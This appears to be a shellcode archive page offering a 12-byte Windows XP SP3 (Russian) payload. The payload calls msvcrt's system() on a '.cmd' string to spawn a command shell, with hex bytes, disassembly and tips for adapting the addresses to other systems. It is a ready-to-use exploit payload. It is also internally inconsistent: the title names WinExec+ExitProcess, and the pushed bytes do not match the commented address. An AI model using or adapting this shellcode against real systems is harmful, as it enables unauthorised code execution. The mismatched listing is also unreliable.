win32/xp sp3 (Ru) WinExec+ExitProcess cmd shellcode 12 bytes

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : win32/xp sp3 (Ru) WinExec+ExitProcess cmd shellcode 12 bytes
# Published : 2010-03-24
# Author : lord Kelvin
# Previous Title : JITed egg-hunter stage-0 shellcode Adjusted universal for xp/vista/win7
# Next Title : Shellcode - Win32 MessageBox (Metasploit module)

68 9D 61 F9 77  push 0x77C01345
B8 C7 93 C1 77  mov eax,msvcrt.system
FF D0           call eax
 
In msvcrt.dll at 0x77C01344 We have string ".cmd", that's the trick.
Code will work in WinXP SP3 Pro Rus, in other versions you'd better search
the string and system(char*) address for yourself.
 
Coded via lord Kelvin.